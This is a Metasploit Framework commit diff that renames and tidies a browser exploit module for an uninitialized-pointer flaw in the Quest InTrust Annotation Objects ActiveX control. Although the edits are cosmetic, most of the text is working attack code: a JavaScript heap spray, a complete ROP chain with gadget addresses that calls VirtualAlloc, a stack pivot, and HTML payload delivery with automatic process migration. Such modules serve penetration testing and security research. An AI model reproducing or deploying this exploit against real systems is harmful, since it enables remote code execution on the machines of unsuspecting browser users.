Module rename. Cleanup whitespace. Fix typos.

unstable
sinn3r 2012-04-12 01:30:01 -05:00
parent 14f85e406f
commit 0d739a1a51
1 changed files with 54 additions and 55 deletions

View File

@ -1,12 +1,8 @@
##
# $Id$
##
###
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# http://metasploit.com/framework/
##
require 'msf/core'
@ -18,32 +14,31 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super( update_info(info,
'Name' => 'Quest InTrust Annotation Objects uninitialized pointer remote code execution',
'Name' => 'Quest InTrust Annotation Objects Uninitialized Pointer',
'Description' => %q{
This module exploits a uninitialized variable vulnerability in the
This module exploits an uninitialized variable vulnerability in the
Annotation Objects ActiveX component. The activeX component loads into memory without
opting into ALSR so this module exploits the vulnerability against windows Vista and
Windows 7 targets. A large heap spray is required to fulfil the requirement that EAX
points to part of the rop chain in a heap chunk and the calculated call will hit the
pivot in a seperate heap chunk. This will take some time in the users browser.
Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX
points to part of the ROP chain in a heap chunk and the calculated call will hit the
pivot in a separate heap chunk. This will take some time in the users browser.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rgod <rgod[at]autistici.org>', # initial discovery & poc
'mr_me <steventhomasseeley[at]gmail.com>', # msf module
'rgod <rgod[at]autistici.org>', # initial discovery & poc
'mr_me <steventhomasseeley[at]gmail.com>' # msf module
],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '80662'],
[ 'BID', '52765'],
[ 'URL', 'http://www.exploit-db.com/exploits/18674/'],
[ 'URL', 'http://www.exploit-db.com/exploits/18674/']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>
{
@ -114,8 +109,6 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
print_status("Target selected: #{my_target.name}") if datastore['VERBOSE']
# Re-generate the payload.
return if ((p = regenerate_payload(cli)) == nil)
@ -141,6 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
memory = new Array();
for (i=0;i<1000;i++){ memory[i] = block+shellcode; }
}
function main(){
heapspray();
#{obj_name}.Add(#{my_target.ret},1);
@ -156,39 +150,39 @@ class Metasploit3 < Msf::Exploit::Remote
junk,
junk,
junk,
0x44014075 # xchg eax,esp ; add [ecx],10 ; retn 8 (pivot)
0x44014075 # xchg eax,esp ; add [ecx],10 ; retn 8 (pivot)
].pack('V*')
rop_gadgets << [0x44015CEF].pack('V*') * 140 # padding of retn's
rop_gadgets << [
0x44015CEF, # retn
0x44015CEF, # retn
0x44015CEF, # retn
0x44015cee, # pop edx ; retn
0x4401a130, # ptr to &VirtualAlloc() (IAT)
0x44015ca4, # mov eax,[edx+4] ; retn
0x44001218, # push eax ; dec eax ; pop esi ; pop ebp ; retn 14
junk, # filler (compensate)
0x440159bb, # pop ebp ; retn
junk, # filler (retn offset compensation)
junk, # filler (retn offset compensation)
junk, # filler (retn offset compensation)
junk, # filler (retn offset compensation)
0x4400238A, # filler (pop edi ; pop esi ; pop ebp ; retn)
0x440012c1, # push esp ; ret 08
0x44016264, # pop ebx ; retn
0x00004000, # 0x00000001-> ebx
0x44015cc9, # pop edx ; retn
0x00001000, # 0x00001000-> edx
0x44017664, # pop ecx ; retn
0x00000040, # 0x00000040-> ecx
0x44017bd8, # pop edi ; retn
0x44017ebe, # retn
0x4400bf25, # pop eax ; retn
0x0C0C2478, # pointer+0x0c to pop edi ; pop esi ; pop ebp ; retn
0x44005C57, # pushad ; push 8 ; push ecx; push esi; call [eax+c]
0x90909090, # nops, do not change as it changes the offset
0x44015CEF, # retn
0x44015CEF, # retn
0x44015CEF, # retn
0x44015cee, # pop edx ; retn
0x4401a130, # ptr to &VirtualAlloc() (IAT)
0x44015ca4, # mov eax,[edx+4] ; retn
0x44001218, # push eax ; dec eax ; pop esi ; pop ebp ; retn 14
junk, # filler (compensate)
0x440159bb, # pop ebp ; retn
junk, # filler (retn offset compensation)
junk, # filler (retn offset compensation)
junk, # filler (retn offset compensation)
junk, # filler (retn offset compensation)
0x4400238A, # filler (pop edi ; pop esi ; pop ebp ; retn)
0x440012c1, # push esp ; ret 08
0x44016264, # pop ebx ; retn
0x00004000, # 0x00000001-> ebx
0x44015cc9, # pop edx ; retn
0x00001000, # 0x00001000-> edx
0x44017664, # pop ecx ; retn
0x00000040, # 0x00000040-> ecx
0x44017bd8, # pop edi ; retn
0x44017ebe, # retn
0x4400bf25, # pop eax ; retn
0x0C0C2478, # pointer+0x0c to pop edi ; pop esi ; pop ebp ; retn
0x44005C57, # pushad ; push 8 ; push ecx; push esi; call [eax+c]
0x90909090, # nops, do not change as it changes the offset
0x90909090,
0x90909090,
0x90909090,
@ -211,15 +205,19 @@ class Metasploit3 < Msf::Exploit::Remote
var data = payload;
while(data.length < 100000) { data += data; }
var onemeg = data.substr(0, 64*1024/2);
for (i=0; i<14; i++) {
onemeg += data.substr(0, 64*1024/2);
}
for (i=0; i<14; i++) {
onemeg += data.substr(0, 64*1024/2);
}
onemeg += data.substr(0, (64*1024/2)-(38/2));
var block = new Array();
for (i=0; i<700; i++) {
block[i] = onemeg.substr(0, onemeg.length);
}
for (i=0; i<700; i++) {
block[i] = onemeg.substr(0, onemeg.length);
}
}
function main(){
heapspray();
#{obj_name}.Add(#{my_target.ret},1);
@ -245,7 +243,8 @@ class Metasploit3 < Msf::Exploit::Remote
</html>
EOF
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
peer = "#{cli.peerhost.ljust(16)} #{self.shortname}"
print_status("#{peer} Sending HTML...")
#Remove the extra tabs from content
content = content.gsub(/^\t\t/, '')